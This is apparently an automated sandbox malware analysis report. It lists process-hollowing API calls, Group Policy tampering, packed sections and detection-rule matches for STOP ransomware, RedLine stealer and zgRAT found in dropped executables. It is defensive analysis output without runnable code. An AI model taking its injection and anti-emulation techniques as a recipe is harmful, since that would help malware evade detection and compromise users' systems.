                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeCode function: 12_2_0431A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,12_2_0431A4F0
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeCode function: 12_2_04319850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,12_2_04319850
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Windows\System32\GroupPolicy\MachineJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Windows\System32\GroupPolicy\UserJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Windows\System32\GroupPolicy\Machine\Registry.polJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeFile created: C:\Windows\SysWOW64\GroupPolicy\gpt.ini
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeCode function: 0_3_044C4B800_3_044C4B80
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeCode function: 0_3_044C4B800_3_044C4B80
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeCode function: 0_3_044C4B800_3_044C4B80
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0040F86A7_2_0040F86A
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_004118877_2_00411887
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_004039C97_2_004039C9
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0040FDDC7_2_0040FDDC
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_004105847_2_00410584
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0040F2F87_2_0040F2F8
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_00405F5F7_2_00405F5F
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0040C7E07_2_0040C7E0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022172207_2_02217220
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022922C07_2_022922C0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0225E37C7_2_0225E37C
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022173937_2_02217393
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0221A0267_2_0221A026
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0222F0307_2_0222F030
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0221B0007_2_0221B000
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0221B0B07_2_0221B0B0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022170E07_2_022170E0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022130F07_2_022130F0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022200D07_2_022200D0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022191207_2_02219120
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0225E1417_2_0225E141
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0223D1A47_2_0223D1A4
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0221A6997_2_0221A699
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0225B69F7_2_0225B69F
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0221E6E07_2_0221E6E0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0221C7607_2_0221C760
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0221A79A7_2_0221A79A
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0223D7F17_2_0223D7F1
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022135207_2_02213520
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022175207_2_02217520
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0221CA107_2_0221CA10
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02217A807_2_02217A80
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02220B007_2_02220B00
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02212B607_2_02212B60
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0221DBE07_2_0221DBE0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022178807_2_02217880
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022318D07_2_022318D0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0221A9167_2_0221A916
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0223E9A37_2_0223E9A3
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_0223F9B07_2_0223F9B0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022159F77_2_022159F7
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_022189D07_2_022189D0
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02218E607_2_02218E60
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02244E9F7_2_02244E9F
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02252D1E7_2_02252D1E
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02215DE77_2_02215DE7
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02215DF77_2_02215DF7
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: 9_2_004669689_2_00466968
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: 9_2_004633D09_2_004633D0
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: 11_2_00AB696811_2_00AB6968
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: 11_2_00AB33D011_2_00AB33D0
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeCode function: 12_2_0431AB1012_2_0431AB10
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6896B6B014_2_6896B6B0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6898497014_2_68984970
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_68984AC014_2_68984AC0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689B0B8914_2_689B0B89
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_68948B3014_2_68948B30
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689BAC2914_2_689BAC29
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_68962D7014_2_68962D70
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_68994EE014_2_68994EE0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6895A0C014_2_6895A0C0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689963B014_2_689963B0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689A231014_2_689A2310
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6898455014_2_68984550
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689BA54D14_2_689BA54D
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6894665014_2_68946650
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6894C7B014_2_6894C7B0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6894A7E014_2_6894A7E0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689958D514_2_689958D5
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689958D714_2_689958D7
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6899583014_2_68995830
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689BB96414_2_689BB964
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689B9AAB14_2_689B9AAB
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_68983C9014_2_68983C90
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689A1CA014_2_689A1CA0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689B5DD214_2_689B5DD2
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_68995DD014_2_68995DD0
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_68995EB914_2_68995EB9
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_68983E5014_2_68983E50
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689B9FFC14_2_689B9FFC
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_689BBFF114_2_689BBFF1
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6899505014_2_68995050
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6899527414_2_68995274
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6898326014_2_68983260
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_6898346014_2_68983460
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_02A28E4014_2_02A28E40
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_02A2BDA814_2_02A2BDA8
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_02A2164814_2_02A21648
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_02A20E4814_2_02A20E48
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_02A20E5814_2_02A20E58
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_02A27DC814_2_02A27DC8
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_05BC0EB314_2_05BC0EB3
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_05BC26F814_2_05BC26F8
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_05BC093014_2_05BC0930
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: 14_2_05BC26DC14_2_05BC26DC
                      Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Security
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: String function: 689AD520 appears 31 times
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: String function: 689A9B35 appears 141 times
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeCode function: String function: 689A90D8 appears 51 times
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeCode function: String function: 00AA5050 appears 48 times
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: String function: 02238EC0 appears 57 times
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: String function: 02240160 appears 50 times
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: String function: 00404ED0 appears 35 times
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeCode function: String function: 00455050 appears 48 times
                      Source: crt[1].exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: _rSi8sV87ppx0bgkbETdFbEZ.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: xS7PhKcNZTx4FuBAD1RB9kbJ.exe.0.drStatic PE information: No import functions for PE file found
                      Source: CHA0VZiz8y.exeBinary or memory string: OriginalFilename vs CHA0VZiz8y.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2164957983.00000000065E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAcq.dll\< vs CHA0VZiz8y.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2165595509.0000000006B12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAcq.dll\< vs CHA0VZiz8y.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2158978752.0000000004440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs CHA0VZiz8y.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2124585502.0000000004478000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesFilezera2 vs CHA0VZiz8y.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2158825080.0000000004BB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs CHA0VZiz8y.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2139765657.0000000004420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFancyZonesEditor.dll4 vs CHA0VZiz8y.exe
                      Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.477ac0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.4510000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                      Source: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                      Source: 41.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.42e7719.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 7.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.22115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                      Source: 7.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.22115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                      Source: 7.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.22115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                      Source: 7.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.22115a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                      Source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                      Source: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.4510000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.42e7719.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.2260000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.2260000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.477ac0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 00000007.00000002.2311748071.0000000002170000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                      Source: 0000001B.00000002.2662012015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                      Source: 0000001B.00000002.2662012015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                      Source: 0000000C.00000002.2337447194.0000000004510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 0000000C.00000002.2317913229.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: Process Memory Space: 7U1bGcxK3Lqi_XMHDNEdJrhB.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                      Source: niko[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9995935120558376
                      Source: niko[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9985767926356589
                      Source: niko[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.99365234375
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: Section: ZLIB complexity 0.9995935120558376
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: Section: ZLIB complexity 0.9985767926356589
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: Section: ZLIB complexity 0.99365234375
                      Source: J9jGBSSbDD3yrTx79DzmOLls.exe.0.drStatic PE information: Section: .data ZLIB complexity 0.9892578125
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: Section: ZLIB complexity 0.9978736139112904
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: Section: ZLIB complexity 0.9941860465116279
